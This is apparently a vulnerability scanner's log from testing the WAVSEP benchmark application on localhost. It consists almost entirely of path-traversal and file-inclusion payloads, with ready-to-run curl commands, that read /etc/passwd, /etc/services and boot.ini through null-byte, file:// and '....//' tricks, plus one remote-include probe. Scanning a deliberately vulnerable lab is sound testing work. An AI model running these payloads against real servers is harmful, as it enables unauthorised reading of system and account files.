curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
